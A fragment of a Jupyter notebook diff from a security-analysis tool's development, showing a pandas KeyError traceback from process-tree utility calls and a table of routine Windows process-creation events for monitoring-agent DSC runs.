+        "\u001b[1;32m~\\AppData\\Local\\Continuum\\anaconda3\\lib\\site-packages\\pandas\\core\\indexes\\base.py\u001b[0m in \u001b[0;36mget_loc\u001b[1;34m(self, key, method, tolerance)\u001b[0m\n\u001b[0;32m   2896\u001b[0m             \u001b[1;32mtry\u001b[0m\u001b[1;33m:\u001b[0m\u001b[1;33m\u001b[0m\u001b[1;33m\u001b[0m\u001b[0m\n\u001b[1;32m-> 2897\u001b[1;33m                 \u001b[1;32mreturn\u001b[0m \u001b[0mself\u001b[0m\u001b[1;33m.\u001b[0m\u001b[0m_engine\u001b[0m\u001b[1;33m.\u001b[0m\u001b[0mget_loc\u001b[0m\u001b[1;33m(\u001b[0m\u001b[0mkey\u001b[0m\u001b[1;33m)\u001b[0m\u001b[1;33m\u001b[0m\u001b[1;33m\u001b[0m\u001b[0m\n\u001b[0m\u001b[0;32m   2898\u001b[0m             \u001b[1;32mexcept\u001b[0m \u001b[0mKeyError\u001b[0m\u001b[1;33m:\u001b[0m\u001b[1;33m\u001b[0m\u001b[1;33m\u001b[0m\u001b[0m\n",
+        "\u001b[1;32mpandas/_libs/index.pyx\u001b[0m in \u001b[0;36mpandas._libs.index.IndexEngine.get_loc\u001b[1;34m()\u001b[0m\n",
+        "\u001b[1;32mpandas/_libs/index.pyx\u001b[0m in \u001b[0;36mpandas._libs.index.IndexEngine.get_loc\u001b[1;34m()\u001b[0m\n",
+        "\u001b[1;32mpandas/_libs/hashtable_class_helper.pxi\u001b[0m in \u001b[0;36mpandas._libs.hashtable.PyObjectHashTable.get_item\u001b[1;34m()\u001b[0m\n",
+        "\u001b[1;32mpandas/_libs/hashtable_class_helper.pxi\u001b[0m in \u001b[0;36mpandas._libs.hashtable.PyObjectHashTable.get_item\u001b[1;34m()\u001b[0m\n",
+        "\u001b[1;31mKeyError\u001b[0m: 'parent_key'",
+        "\nDuring handling of the above exception, another exception occurred:\n",
+        "\u001b[1;31mKeyError\u001b[0m                                  Traceback (most recent call last)",
+        "\u001b[1;32m<ipython-input-62-334092e491a0>\u001b[0m in \u001b[0;36m<module>\u001b[1;34m\u001b[0m\n\u001b[0;32m      1\u001b[0m \u001b[0mparent\u001b[0m \u001b[1;33m=\u001b[0m \u001b[0mptutil\u001b[0m\u001b[1;33m.\u001b[0m\u001b[0mget_parent\u001b[0m\u001b[1;33m(\u001b[0m\u001b[0mp_tree\u001b[0m\u001b[1;33m,\u001b[0m \u001b[0mchildren2\u001b[0m\u001b[1;33m.\u001b[0m\u001b[0miloc\u001b[0m\u001b[1;33m[\u001b[0m\u001b[1;36m0\u001b[0m\u001b[1;33m]\u001b[0m\u001b[1;33m)\u001b[0m\u001b[1;33m\u001b[0m\u001b[1;33m\u001b[0m\u001b[0m\n\u001b[0;32m      2\u001b[0m \u001b[0mproc\u001b[0m \u001b[1;33m=\u001b[0m \u001b[0mptutil\u001b[0m\u001b[1;33m.\u001b[0m\u001b[0mget_process\u001b[0m\u001b[1;33m(\u001b[0m\u001b[0mp_tree\u001b[0m\u001b[1;33m,\u001b[0m \u001b[0mchildren2\u001b[0m\u001b[1;33m.\u001b[0m\u001b[0miloc\u001b[0m\u001b[1;33m[\u001b[0m\u001b[1;36m0\u001b[0m\u001b[1;33m]\u001b[0m\u001b[1;33m)\u001b[0m\u001b[1;33m\u001b[0m\u001b[1;33m\u001b[0m\u001b[0m\n\u001b[1;32m----> 3\u001b[1;33m \u001b[0msiblings\u001b[0m \u001b[1;33m=\u001b[0m \u001b[0mptutil\u001b[0m\u001b[1;33m.\u001b[0m\u001b[0mget_children\u001b[0m\u001b[1;33m(\u001b[0m\u001b[0mprocs\u001b[0m\u001b[1;33m,\u001b[0m \u001b[0mparent\u001b[0m\u001b[1;33m,\u001b[0m \u001b[0minclude_source\u001b[0m\u001b[1;33m=\u001b[0m\u001b[1;32mFalse\u001b[0m\u001b[1;33m)\u001b[0m\u001b[1;33m\u001b[0m\u001b[1;33m\u001b[0m\u001b[0m\n\u001b[0m\u001b[0;32m      4\u001b[0m \u001b[0msiblings\u001b[0m\u001b[1;33m\u001b[0m\u001b[1;33m\u001b[0m\u001b[0m\n\u001b[0;32m      5\u001b[0m \u001b[1;31m#     if not include_source:\u001b[0m\u001b[1;33m\u001b[0m\u001b[1;33m\u001b[0m\u001b[1;33m\u001b[0m\u001b[0m\n",
+        "\u001b[1;32me:\\src\\microsoft\\msticpy\\msticpy\\msticpy\\sectools\\process_tree_utils.py\u001b[0m in \u001b[0;36mget_children\u001b[1;34m(procs, source, include_source)\u001b[0m\n\u001b[0;32m    665\u001b[0m ) -> pd.DataFrame:\n\u001b[0;32m    666\u001b[0m     \"\"\"\n\u001b[1;32m--> 667\u001b[1;33m     \u001b[0mReturn\u001b[0m \u001b[0mthe\u001b[0m \u001b[0mchild\u001b[0m \u001b[0mprocesses\u001b[0m \u001b[1;32mfor\u001b[0m \u001b[0mthe\u001b[0m \u001b[0msource\u001b[0m \u001b[0mprocess\u001b[0m\u001b[1;33m.\u001b[0m\u001b[1;33m\u001b[0m\u001b[1;33m\u001b[0m\u001b[0m\n\u001b[0m\u001b[0;32m    668\u001b[0m \u001b[1;33m\u001b[0m\u001b[0m\n\u001b[0;32m    669\u001b[0m     \u001b[0mParameters\u001b[0m\u001b[1;33m\u001b[0m\u001b[1;33m\u001b[0m\u001b[0m\n",
+        "\u001b[1;32m~\\AppData\\Local\\Continuum\\anaconda3\\lib\\site-packages\\pandas\\core\\frame.py\u001b[0m in \u001b[0;36m__getitem__\u001b[1;34m(self, key)\u001b[0m\n\u001b[0;32m   2993\u001b[0m             \u001b[1;32mif\u001b[0m \u001b[0mself\u001b[0m\u001b[1;33m.\u001b[0m\u001b[0mcolumns\u001b[0m\u001b[1;33m.\u001b[0m\u001b[0mnlevels\u001b[0m \u001b[1;33m>\u001b[0m \u001b[1;36m1\u001b[0m\u001b[1;33m:\u001b[0m\u001b[1;33m\u001b[0m\u001b[1;33m\u001b[0m\u001b[0m\n\u001b[0;32m   2994\u001b[0m                 \u001b[1;32mreturn\u001b[0m \u001b[0mself\u001b[0m\u001b[1;33m.\u001b[0m\u001b[0m_getitem_multilevel\u001b[0m\u001b[1;33m(\u001b[0m\u001b[0mkey\u001b[0m\u001b[1;33m)\u001b[0m\u001b[1;33m\u001b[0m\u001b[1;33m\u001b[0m\u001b[0m\n\u001b[1;32m-> 2995\u001b[1;33m             \u001b[0mindexer\u001b[0m \u001b[1;33m=\u001b[0m \u001b[0mself\u001b[0m\u001b[1;33m.\u001b[0m\u001b[0mcolumns\u001b[0m\u001b[1;33m.\u001b[0m\u001b[0mget_loc\u001b[0m\u001b[1;33m(\u001b[0m\u001b[0mkey\u001b[0m\u001b[1;33m)\u001b[0m\u001b[1;33m\u001b[0m\u001b[1;33m\u001b[0m\u001b[0m\n\u001b[0m\u001b[0;32m   2996\u001b[0m             \u001b[1;32mif\u001b[0m \u001b[0mis_integer\u001b[0m\u001b[1;33m(\u001b[0m\u001b[0mindexer\u001b[0m\u001b[1;33m)\u001b[0m\u001b[1;33m:\u001b[0m\u001b[1;33m\u001b[0m\u001b[1;33m\u001b[0m\u001b[0m\n\u001b[0;32m   2997\u001b[0m                 \u001b[0mindexer\u001b[0m \u001b[1;33m=\u001b[0m \u001b[1;33m[\u001b[0m\u001b[0mindexer\u001b[0m\u001b[1;33m]\u001b[0m\u001b[1;33m\u001b[0m\u001b[1;33m\u001b[0m\u001b[0m\n",
+        "\u001b[1;32m~\\AppData\\Local\\Continuum\\anaconda3\\lib\\site-packages\\pandas\\core\\indexes\\base.py\u001b[0m in \u001b[0;36mget_loc\u001b[1;34m(self, key, method, tolerance)\u001b[0m\n\u001b[0;32m   2897\u001b[0m                 \u001b[1;32mreturn\u001b[0m \u001b[0mself\u001b[0m\u001b[1;33m.\u001b[0m\u001b[0m_engine\u001b[0m\u001b[1;33m.\u001b[0m\u001b[0mget_loc\u001b[0m\u001b[1;33m(\u001b[0m\u001b[0mkey\u001b[0m\u001b[1;33m)\u001b[0m\u001b[1;33m\u001b[0m\u001b[1;33m\u001b[0m\u001b[0m\n\u001b[0;32m   2898\u001b[0m             \u001b[1;32mexcept\u001b[0m \u001b[0mKeyError\u001b[0m\u001b[1;33m:\u001b[0m\u001b[1;33m\u001b[0m\u001b[1;33m\u001b[0m\u001b[0m\n\u001b[1;32m-> 2899\u001b[1;33m                 \u001b[1;32mreturn\u001b[0m \u001b[0mself\u001b[0m\u001b[1;33m.\u001b[0m\u001b[0m_engine\u001b[0m\u001b[1;33m.\u001b[0m\u001b[0mget_loc\u001b[0m\u001b[1;33m(\u001b[0m\u001b[0mself\u001b[0m\u001b[1;33m.\u001b[0m\u001b[0m_maybe_cast_indexer\u001b[0m\u001b[1;33m(\u001b[0m\u001b[0mkey\u001b[0m\u001b[1;33m)\u001b[0m\u001b[1;33m)\u001b[0m\u001b[1;33m\u001b[0m\u001b[1;33m\u001b[0m\u001b[0m\n\u001b[0m\u001b[0;32m   2900\u001b[0m         \u001b[0mindexer\u001b[0m \u001b[1;33m=\u001b[0m \u001b[0mself\u001b[0m\u001b[1;33m.\u001b[0m\u001b[0mget_indexer\u001b[0m\u001b[1;33m(\u001b[0m\u001b[1;33m[\u001b[0m\u001b[0mkey\u001b[0m\u001b[1;33m]\u001b[0m\u001b[1;33m,\u001b[0m \u001b[0mmethod\u001b[0m\u001b[1;33m=\u001b[0m\u001b[0mmethod\u001b[0m\u001b[1;33m,\u001b[0m \u001b[0mtolerance\u001b[0m\u001b[1;33m=\u001b[0m\u001b[0mtolerance\u001b[0m\u001b[1;33m)\u001b[0m\u001b[1;33m\u001b[0m\u001b[1;33m\u001b[0m\u001b[0m\n\u001b[0;32m   2901\u001b[0m         \u001b[1;32mif\u001b[0m \u001b[0mindexer\u001b[0m\u001b[1;33m.\u001b[0m\u001b[0mndim\u001b[0m \u001b[1;33m>\u001b[0m \u001b[1;36m1\u001b[0m \u001b[1;32mor\u001b[0m \u001b[0mindexer\u001b[0m\u001b[1;33m.\u001b[0m\u001b[0msize\u001b[0m \u001b[1;33m>\u001b[0m \u001b[1;36m1\u001b[0m\u001b[1;33m:\u001b[0m\u001b[1;33m\u001b[0m\u001b[1;33m\u001b[0m\u001b[0m\n",
+        "\u001b[1;32mpandas/_libs/index.pyx\u001b[0m in \u001b[0;36mpandas._libs.index.IndexEngine.get_loc\u001b[1;34m()\u001b[0m\n",
+        "\u001b[1;32mpandas/_libs/index.pyx\u001b[0m in \u001b[0;36mpandas._libs.index.IndexEngine.get_loc\u001b[1;34m()\u001b[0m\n",
+        "\u001b[1;32mpandas/_libs/hashtable_class_helper.pxi\u001b[0m in \u001b[0;36mpandas._libs.hashtable.PyObjectHashTable.get_item\u001b[1;34m()\u001b[0m\n",
+        "\u001b[1;32mpandas/_libs/hashtable_class_helper.pxi\u001b[0m in \u001b[0;36mpandas._libs.hashtable.PyObjectHashTable.get_item\u001b[1;34m()\u001b[0m\n",
+        "\u001b[1;31mKeyError\u001b[0m: 'parent_key'"
+       ]
+      }
+     ],
+     "persistentId": "2cb7192e-4b90-4e32-a0f6-5017896f5d7c",
+     "text": "parent = ptutil.get_parent(p_tree, children2.iloc[0])\nproc = ptutil.get_process(p_tree, children2.iloc[0])\nsiblings = ptutil.get_children(procs, parent, include_source=False)\nsiblings\n#     if not include_source:\n#         return siblings.loc[~proc]\n#     return siblings"
+    },
+    "executionTime": "2019-12-13T21:10:06.868Z"
+   },
+   {
+    "cell": {
+     "executionCount": 63,
+     "executionEventId": "1cf10840-24e2-41d1-901e-4d2322db7fe0",
+     "hasError": false,
+     "id": "8b106c58-d787-4dee-8e64-c1e9a1b7f1e7",
+     "outputs": [
+      {
+       "data": {
+        "text/html": "<div>\n<style scoped>\n    .dataframe tbody tr th:only-of-type {\n        vertical-align: middle;\n    }\n\n    .dataframe tbody tr th {\n        vertical-align: top;\n    }\n\n    .dataframe thead th {\n        text-align: right;\n    }\n</style>\n<table border=\"1\" class=\"dataframe\">\n  <thead>\n    <tr style=\"text-align: right;\">\n      <th></th>\n      <th>TenantId</th>\n      <th>Account</th>\n      <th>EventID</th>\n      <th>TimeGenerated</th>\n      <th>Computer</th>\n      <th>SubjectUserSid</th>\n      <th>SubjectUserName</th>\n      <th>SubjectDomainName</th>\n      <th>SubjectLogonId</th>\n      <th>NewProcessId</th>\n      <th>...</th>\n      <th>source_index_par</th>\n      <th>ProcessId_par</th>\n      <th>NewProcessName_par</th>\n      <th>TimeGenerated_orig_par</th>\n      <th>parent_key</th>\n      <th>IsRoot</th>\n      <th>IsLeaf</th>\n      <th>IsBranch</th>\n      <th>path</th>\n      <th>parent_index</th>\n    </tr>\n    <tr>\n      <th>proc_key</th>\n      <th></th>\n      <th></th>\n      <th></th>\n      <th></th>\n      <th></th>\n      <th></th>\n      <th></th>\n      <th></th>\n      <th></th>\n      <th></th>\n      <th></th>\n      <th></th>\n      <th></th>\n      <th></th>\n      <th></th>\n      <th></th>\n      <th></th>\n      <th></th>\n      <th></th>\n      <th></th>\n      <th></th>\n    </tr>\n  </thead>\n  <tbody>\n    <tr>\n      <th>c:\\program files\\microsoft monitoring agent\\agent\\health service state\\ict 2\\cmf\\desiredstateconfiguration\\dscrun.exe0x15c82019-02-09 20:32:56.260000</th>\n      <td>52b1ab41-869e-4138-9e40-2a4457f09bf0</td>\n      <td>WORKGROUP\\MSTICAlertsWin1$</td>\n      <td>4688</td>\n      <td>2019-02-09 20:32:56.260</td>\n      <td>MSTICAlertsWin1</td>\n      <td>S-1-5-18</td>\n      <td>MSTICAlertsWin1$</td>\n      <td>WORKGROUP</td>\n      <td>0x3e7</td>\n      <td>0x15c8</td>\n      <td>...</td>\n      <td>NaN</td>\n      <td>NaN</td>\n      <td>NaN</td>\n      <td>1970-01-01</td>\n      <td>c:\\program files\\microsoft monitoring agent\\ag...</td>\n      <td>False</td>\n      <td>False</td>\n      <td>True</td>\n      <td>1004/5</td>\n      <td>1004</td>\n    </tr>\n    <tr>\n      <th>c:\\program files\\microsoft monitoring agent\\agent\\health service state\\ict 2\\cmf-64\\desiredstateconfiguration\\dscrun.exe0xcd82019-02-09 20:52:56.260000</th>\n      <td>52b1ab41-869e-4138-9e40-2a4457f09bf0</td>\n      <td>WORKGROUP\\MSTICAlertsWin1$</td>\n      <td>4688</td>\n      <td>2019-02-09 20:52:56.260</td>\n      <td>MSTICAlertsWin1</td>\n      <td>S-1-5-18</td>\n      <td>MSTICAlertsWin1$</td>\n      <td>WORKGROUP</td>\n      <td>0x3e7</td>\n      <td>0xcd8</td>\n      <td>...</td>\n      <td>NaN</td>\n      <td>NaN</td>\n      <td>NaN</td>\n      <td>1970-01-01</td>\n      <td>c:\\program files\\microsoft monitoring agent\\ag...</td>\n      <td>False</td>\n      <td>False</td>\n      <td>True</td>\n      <td>1004/8</td>\n      <td>1004</td>\n    </tr>\n    <tr>\n      <th>c:\\program files\\microsoft monitoring agent\\agent\\health service state\\ict 2\\cmf\\desiredstateconfiguration\\dscrun.exe0x8dc2019-02-09 21:02:56.257000</th>\n      <td>52b1ab41-869e-4138-9e40-2a4457f09bf0</td>\n      <td>WORKGROUP\\MSTICAlertsWin1$</td>\n      <td>4688</td>\n      <td>2019-02-09 21:02:56.257</td>\n      <td>MSTICAlertsWin1</td>\n      <td>S-1-5-18</td>\n      <td>MSTICAlertsWin1$</td>\n      <td>WORKGROUP</td>\n      <td>0x3e7</td>\n      <td>0x8dc</td>\n      <td>...</td>\n      <td>NaN</td>\n      <td>NaN</td>\n      <td>NaN</td>\n      <td>1970-01-01</td>\n      <td>c:\\program files\\microsoft monitoring agent\\ag...</td>\n      <td>False</td>\n      <td>False</td>\n      <td>True</td>\n      <td>1004/10</td>\n      <td>1004</td>\n    </tr>\n    <tr>\n      <th>c:\\program files\\microsoft monitoring agent\\agent\\health service state\\ict 2\\cmf\\desiredstateconfiguration\\dscrun.exe0xbd02019-02-09 21:32:56.270000</th>\n      <td>52b1ab41-869e-4138-9e40-2a4457f09bf0</td>\n      <td>WORKGROUP\\MSTICAlertsWin1$</td>\n      <td>4688</td>\n      <td>2019-02-09 21:32:56.270</td>\n      <td>MSTICAlertsWin1</td>\n      <td>S-1-5-18</td>\n      <td>MSTICAlertsWin1$</td>\n      <td>WORKGROUP</td>\n      <td>0x3e7</td>\n      <td>0xbd0</td>\n      <td>...</td>\n      <td>NaN</td>\n      <td>NaN</td>\n      <td>NaN</td>\n      <td>1970-01-01</td>\n      <td>c:\\program files\\microsoft monitoring agent\\ag...</td>\n      <td>False</td>\n      <td>False</td>\n      <td>True</td>\n      <td>1004/15</td>\n      <td>1004</td>\n    </tr>\n    <tr>\n      <th>c:\\program files\\microsoft monitoring agent\\agent\\health service state\\ict 2\\cmf\\desiredstateconfiguration\\dscrun.exe0xe342019-02-09 22:02:56.263000</th>\n      <td>52b1ab41-869e-4138-9e40-2a4457f09bf0</td>\n      <td>WORKGROUP\\MSTICAlertsWin1$</td>\n      <td>4688</td>\n      <td>2019-02-09 22:02:56.263</td>\n      <td>MSTICAlertsWin1</td>\n      <td>S-1-5-18</td>\n      <td>MSTICAlertsWin1$</td>\n      <td>WORKGROUP</td>\n      <td>0x3e7</td>\n      <td>0xe34</td>\n      <td>...</td>\n      <td>NaN</td>\n      <td>NaN</td>\n      <td>NaN</td>\n      <td>1970-01-01</td>\n      <td>c:\\program files\\microsoft monitoring agent\\ag...</td>\n      <td>False</td>\n      <td>False</td>\n      <td>True</td>\n      <td>1004/67</td>\n      <td>1004</td>\n    </tr>\n    <tr>\n      <th>c:\\program files\\microsoft monitoring agent\\agent\\health service state\\ict 2\\cmf-64\\desiredstateconfiguration\\dscrun.exe0x53c2019-02-09 22:32:56.247000</th>\n      <td>52b1ab41-869e-4138-9e40-2a4457f09bf0</td>\n      <td>WORKGROUP\\MSTICAlertsWin1$</td>\n      <td>4688</td>\n      <td>2019-02-09 22:32:56.247</td>\n      <td>MSTICAlertsWin1</td>\n      <td>S-1-5-18</td>\n      <td>MSTICAlertsWin1$</td>\n      <td>WORKGROUP</td>\n      <td>0x3e7</td>\n      <td>0x53c</td>\n      <td>...</td>\n      <td>NaN</td>\n      <td>NaN</td>\n      <td>NaN</td>\n      <td>1970-01-01</td>\n      <td>c:\\program files\\microsoft monitoring agent\\ag...</td>\n      <td>False</td>\n      <td>False</td>\n      <td>True</td>\n      <td>1004/76</td>\n      <td>1004</td>\n    </tr>\n    <tr>\n      <th>c:\\program files\\microsoft monitoring agent\\agent\\health service state\\ict 2\\cmf\\desiredstateconfiguration\\dscrun.exe0xef42019-02-09 22:32:56.260000</th>\n      <td>52b1ab41-869e-4138-9e40-2a4457f09bf0</td>\n      <td>WORKGROUP\\MSTICAlertsWin1$</td>\n      <td>4688</td>\n      <td>2019-02-09 22:32:56.260</td>\n      <td>MSTICAlertsWin1</td>\n      <td>S-1-5-18</td>\n      <td>MSTICAlertsWin1$</td>\n      <td>WORKGROUP</td>\n      <td>0x3e7</td>\n      <td>0xef4</td>\n      <td>...</td>\n      <td>NaN</td>\n      <td>NaN</td>\n      <td>NaN</td>\n      <td>1970-01-01</td>\n      <td>c:\\program files\\microsoft monitoring agent\\ag...</td>\n      <td>False</td>\n      <td>False</td>\n      <td>True</td>\n      <td>1004/78</td>\n      <td>1004</td>\n    </tr>\n    <tr>\n      <th>c:\\program files\\microsoft monitoring agent\\agent\\health service state\\ict 2\\cmf-64\\desiredstateconfiguration\\dscrun.exe0xd742019-02-09 23:22:56.257000</th>\n      <td>52b1ab41-869e-4138-9e40-2a4457f09bf0</td>\n      <td>WORKGROUP\\MSTICAlertsWin1$</td>\n      <td>4688</td>\n      <td>2019-02-09 23:22:56.257</td>\n      <td>MSTICAlertsWin1</td>\n      <td>S-1-5-18</td>\n      <td>MSTICAlertsWin1$</td>\n      <td>WORKGROUP</td>\n      <td>0x3e7</td>\n      <td>0xd74</td>\n      <td>...</td>\n      <td>NaN</td>\n      <td>NaN</td>\n      <td>NaN</td>\n      <td>1970-01-01</td>\n      <td>c:\\program files\\microsoft monitoring agent\\ag...</td>\n      <td>False</td>\n      <td>False</td>\n      <td>True</td>\n      <td>1004/107</td>\n      <td>1004</td>\n    </tr>\n    <tr>\n      <th>c:\\program files\\microsoft monitoring agent\\agent\\health service state\\ict 2\\cmf\\desiredstateconfiguration\\dscrun.exe0x6f82019-02-09 23:32:56.260000</th>\n      <td>52b1ab41-869e-4138-9e40-2a4457f09bf0</td>\n      <td>WORKGROUP\\MSTICAlertsWin1$</td>\n      <td>4688</td>\n      <td>2019-02-09 23:32:56.260</td>\n      <td>MSTICAlertsWin1</td>\n      <td>S-1-5-18</td>\n      <td>MSTICAlertsWin1$</td>\n      <td>WORKGROUP</td>\n      <td>0x3e7</td>\n      <td>0x6f8</td>\n      <td>...</td>\n      <td>NaN</td>\n      <td>NaN</td>\n      <td>NaN</td>\n      <td>1970-01-01</td>\n      <td>c:\\program files\\microsoft monitoring agent\\ag...</td>\n      <td>False</td>\n      <td>False</td>\n      <td>True</td>\n      <td>1004/120</td>\n      <td>1004</td>\n    </tr>\n    <tr>\n      <th>c:\\program files\\microsoft monitoring agent\\agent\\health service state\\ict 2\\cmf\\desiredstateconfiguration\\dscrun.exe0x1fc02019-02-10 00:02:56.257000</th>\n      <td>52b1ab41-869e-4138-9e40-2a4457f09bf0</td>\n      <td>WORKGROUP\\MSTICAlertsWin1$</td>\n      <td>4688</td>\n      <td>2019-02-10 00:02:56.257</td>\n      <td>MSTICAlertsWin1</td>\n      <td>S-1-5-18</td>\n      <td>MSTICAlertsWin1$</td>\n      <td>WORKGROUP</td>\n      <td>0x3e7</td>\n      <td>0x1fc0</td>\n      <td>...</td>\n      <td>NaN</td>\n      <td>NaN</td>\n      <td>NaN</td>\n      <td>1970-01-01</td>\n      <td>c:\\program files\\microsoft monitoring agent\\ag...</td>\n      <td>False</td>\n      <td>False</td>\n      <td>True</td>\n      <td>1004/127</td>\n      <td>1004</td>\n    </tr>\n    <tr>\n      <th>c:\\program files\\microsoft monitoring agent\\agent\\health service state\\ict 2\\cmf-64\\desiredstateconfiguration\\dscrun.exe0x10bc2019-02-10 00:12:56.253000</th>\n      <td>52b1ab41-869e-4138-9e40-2a4457f09bf0</td>\n      <td>WORKGROUP\\MSTICAlertsWin1$</td>\n      <td>4688</td>\n      <td>2019-02-10 00:12:56.253</td>\n      <td>MSTICAlertsWin1</td>\n      <td>S-1-5-18</td>\n      <td>MSTICAlertsWin1$</td>\n      <td>WORKGROUP</td>\n      <td>0x3e7</td>\n      <td>0x10bc</td>\n      <td>...</td>\n      <td>NaN</td>\n      <td>NaN</td>\n      <td>NaN</td>\n      <td>1970-01-01</td>\n      <td>c:\\program files\\microsoft monitoring agent\\ag...</td>\n      <td>False</td>\n      <td>False</td>\n      <td>True</td>\n      <td>1004/129</td>\n      <td>1004</td>\n    </tr>\n    <tr>\n      <th>c:\\program files\\microsoft monitoring agent\\agent\\health service state\\ict 2\\cmf\\desiredstateconfiguration\\dscrun.exe0xb482019-02-10 00:32:56.270000</th>\n      <td>52b1ab41-869e-4138-9e40-2a4457f09bf0</td>\n      <td>WORKGROUP\\MSTICAlertsWin1$</td>\n      <td>4688</td>\n      <td>2019-02-10 00:32:56.270</td>\n      <td>MSTICAlertsWin1</td>\n      <td>S-1-5-18</td>\n      <td>MSTICAlertsWin1$</td>\n      <td>WORKGROUP</td>\n      <td>0x3e7</td>\n      <td>0xb48</td>\n      <td>...</td>\n      <td>NaN</td>\n      <td>NaN</td>\n      <td>NaN</td>\n      <td>1970-01-01</td>\n      <td>c:\\program files\\microsoft monitoring agent\\ag...</td>\n      <td>False</td>\n      <td>False</td>\n      <td>True</td>\n      <td>1004/139</td>\n      <td>1004</td>\n    </tr>\n  </tbody>\n</table>\n<p>12 rows × 35 columns</p>\n</div>",
+        "text/plain": "                                                                                TenantId  \\\nproc_key                                                                                   \nc:\\program files\\microsoft monitoring agent\\age...  52b1ab41-869e-4138-9e40-2a4457f09bf0   \nc:\\program files\\microsoft monitoring agent\\age...  52b1ab41-869e-4138-9e40-2a4457f09bf0   \nc:\\program files\\microsoft monitoring agent\\age...  52b1ab41-869e-4138-9e40-2a4457f09bf0   \nc:\\program files\\microsoft monitoring agent\\age...  52b1ab41-869e-4138-9e40-2a4457f09bf0   \nc:\\program files\\microsoft monitoring agent\\age...  52b1ab41-869e-4138-9e40-2a4457f09bf0   \nc:\\program files\\microsoft monitoring agent\\age...  52b1ab41-869e-4138-9e40-2a4457f09bf0   \nc:\\program files\\microsoft monitoring agent\\age...  52b1ab41-869e-4138-9e40-2a4457f09bf0   \nc:\\program files\\microsoft monitoring agent\\age...  52b1ab41-869e-4138-9e40-2a4457f09bf0   \nc:\\program files\\microsoft monitoring agent\\age...  52b1ab41-869e-4138-9e40-2a4457f09bf0   \nc:\\program files\\microsoft monitoring agent\\age...  52b1ab41-869e-4138-9e40-2a4457f09bf0   \nc:\\program files\\microsoft monitoring agent\\age...  52b1ab41-869e-4138-9e40-2a4457f09bf0   \nc:\\program files\\microsoft monitoring agent\\age...  52b1ab41-869e-4138-9e40-2a4457f09bf0   \n\n                                                                       Account  \\\nproc_key                                                                         \nc:\\program files\\microsoft monitoring agent\\age...  WORKGROUP\\MSTICAlertsWin1$   \nc:\\program files\\microsoft monitoring agent\\age...  WORKGROUP\\MSTICAlertsWin1$   \nc:\\program files\\microsoft monitoring agent\\age...  WORKGROUP\\MSTICAlertsWin1$   \nc:\\program files\\microsoft monitoring agent\\age...  WORKGROUP\\MSTICAlertsWin1$   \nc:\\program files\\microsoft monitoring agent\\age...  WORKGROUP\\MSTICAlertsWin1$   \nc:\\program files\\microsoft monitoring agent\\age...  WORKGROUP\\MSTICAlertsWin1$   \nc:\\program files\\microsoft monitoring agent\\age...  WORKGROUP\\MSTICAlertsWin1$   \nc:\\program files\\microsoft monitoring agent\\age...  WORKGROUP\\MSTICAlertsWin1$   \nc:\\program files\\microsoft monitoring agent\\age...  WORKGROUP\\MSTICAlertsWin1$   \nc:\\program files\\microsoft monitoring agent\\age...  WORKGROUP\\MSTICAlertsWin1$   \nc:\\program files\\microsoft monitoring agent\\age...  WORKGROUP\\MSTICAlertsWin1$   \nc:\\program files\\microsoft monitoring agent\\age...  WORKGROUP\\MSTICAlertsWin1$   \n\n                                                    EventID  \\\nproc_key                                                      \nc:\\program files\\microsoft monitoring agent\\age...     4688   \nc:\\program files\\microsoft monitoring agent\\age...     4688   \nc:\\program files\\microsoft monitoring agent\\age...     4688   \nc:\\program files\\microsoft monitoring agent\\age...     4688   \nc:\\program files\\microsoft monitoring agent\\age...     4688   \nc:\\program files\\microsoft monitoring agent\\age...     4688   \nc:\\program files\\microsoft monitoring agent\\age...     4688   \nc:\\program files\\microsoft monitoring agent\\age...     4688   \nc:\\program files\\microsoft monitoring agent\\age...     4688   \nc:\\program files\\microsoft monitoring agent\\age...     4688   \nc:\\program files\\microsoft monitoring agent\\age...     4688   \nc:\\program files\\microsoft monitoring agent\\age...     4688   \n\n                                                             TimeGenerated  \\\nproc_key                                                                     \nc:\\program files\\microsoft monitoring agent\\age... 2019-02-09 20:32:56.260   \nc:\\program files\\microsoft monitoring agent\\age... 2019-02-09 20:52:56.260   \nc:\\program files\\microsoft monitoring agent\\age... 2019-02-09 21:02:56.257   \nc:\\program files\\microsoft monitoring agent\\age... 2019-02-09 21:32:56.270   \nc:\\program files\\microsoft monitoring agent\\age... 2019-02-09 22:02:56.263   \nc:\\program files\\microsoft monitoring agent\\age... 2019-02-09 22:32:56.247   \nc:\\program files\\microsoft monitoring agent\\age... 2019-02-09 22:32:56.260   \nc:\\program files\\microsoft monitoring agent\\age... 2019-02-09 23:22:56.257   \nc:\\program files\\microsoft monitoring agent\\age... 2019-02-09 23:32:56.260   \nc:\\program files\\microsoft monitoring agent\\age... 2019-02-10 00:02:56.257   \nc:\\program files\\microsoft monitoring agent\\age... 2019-02-10 00:12:56.253   \nc:\\program files\\microsoft monitoring agent\\age... 2019-02-10 00:32:56.270   \n\n                                                           Computer  \\\nproc_key                                                              \nc:\\program files\\microsoft monitoring agent\\age...  MSTICAlertsWin1   \nc:\\program files\\microsoft monitoring agent\\age...  MSTICAlertsWin1   \nc:\\program files\\microsoft monitoring agent\\age...  MSTICAlertsWin1   \nc:\\program files\\microsoft monitoring agent\\age...  MSTICAlertsWin1   \nc:\\program files\\microsoft monitoring agent\\age...  MSTICAlertsWin1   \nc:\\program files\\microsoft monitoring agent\\age...  MSTICAlertsWin1   \nc:\\program files\\microsoft monitoring agent\\age...  MSTICAlertsWin1   \nc:\\program files\\microsoft monitoring agent\\age...  MSTICAlertsWin1   \nc:\\program files\\microsoft monitoring agent\\age...  MSTICAlertsWin1   \nc:\\program files\\microsoft monitoring agent\\age...  MSTICAlertsWin1   \nc:\\program files\\microsoft monitoring agent\\age...  MSTICAlertsWin1   \nc:\\program files\\microsoft monitoring agent\\age...  MSTICAlertsWin1   \n\n                                                   SubjectUserSid  \\\nproc_key                                                            \nc:\\program files\\microsoft monitoring agent\\age...       S-1-5-18   \nc:\\program files\\microsoft monitoring agent\\age...       S-1-5-18   \nc:\\program files\\microsoft monitoring agent\\age...       S-1-5-18   \nc:\\program files\\microsoft monitoring agent\\age...       S-1-5-18   \nc:\\program files\\microsoft monitoring agent\\age...       S-1-5-18   \nc:\\program files\\microsoft monitoring agent\\age...       S-1-5-18   \nc:\\program files\\microsoft monitoring agent\\age...       S-1-5-18   \nc:\\program files\\microsoft monitoring agent\\age...       S-1-5-18   \nc:\\program files\\microsoft monitoring agent\\age...       S-1-5-18   \nc:\\program files\\microsoft monitoring agent\\age...       S-1-5-18   \nc:\\program files\\microsoft monitoring agent\\age...       S-1-5-18   